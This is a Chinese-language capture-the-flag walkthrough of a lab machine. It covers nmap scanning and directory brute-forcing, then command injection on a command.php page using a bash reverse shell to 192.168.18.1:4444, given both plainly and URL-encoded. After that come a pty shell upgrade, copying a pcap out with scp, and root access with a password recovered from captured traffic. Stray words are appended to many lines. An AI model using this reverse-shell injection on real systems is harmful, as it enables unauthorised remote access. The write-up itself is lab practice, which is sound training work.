利用namp 先進行掃描獲取ipphp
nmap 192.168.18.*python
獲取ip 沒發現80端口 主機存活 猜想能夠是個2000之後的端口瀏覽器
nmap -p1-65533 192.168.18.146 返回bash
192.168.18.146:33447 開放33447端口服務器
利用御劍和進行burpsuit 爆破 獲得tcp
imges ,index ,challenge 等目錄 接着對其二次爆破post
cake 發現目錄 /Magic_Boxui
繼續對/challenge /Magic_Box 爆破 發現 發現low.php,command.phpspa
訪問low.php是個空頁面,訪問command.php,發現命令執行界面 這個時候直接反彈 3d
輸入 127.0.0.1&&echo "bash -i >& /dev/tcp/192.168.18.1/4444 0>&1" | bash 在post get 繼續傳遞的時候 && 會被當初參數傳遞
這裏咱們把 && 後門的轉義 以後在bp 發包
IP=127.0.0.1%26%26%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%2e%31%2f%34%34%34%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68&submit=submit
這邊接受到
接受輸入 python -c 'import pty;pty.spawn("/bin/bash")'
能夠執行su 命令終端 進去能夠提權了
將這個文件放到能夠訪問位置 利用python 搭建一個臨時服務器
cd /sbin/raw_vs_isi
能夠直接下載 也能夠利用 s
scp 進行本地遠程下載
scp /sbin/raw_vs_isi/hint.pcapng yzj@192.168.18.134:/home/yzj
Are you sure you want to continue connecting (yes/no)? yes
yzj@192.168.18.134's password: a123456
成功 丟入 Wireshark 找到一個tcp 包 追蹤tcp流量包
sudo -i 嘗試提權
發現root 密碼也是1337hax0r
查看cat flag.txt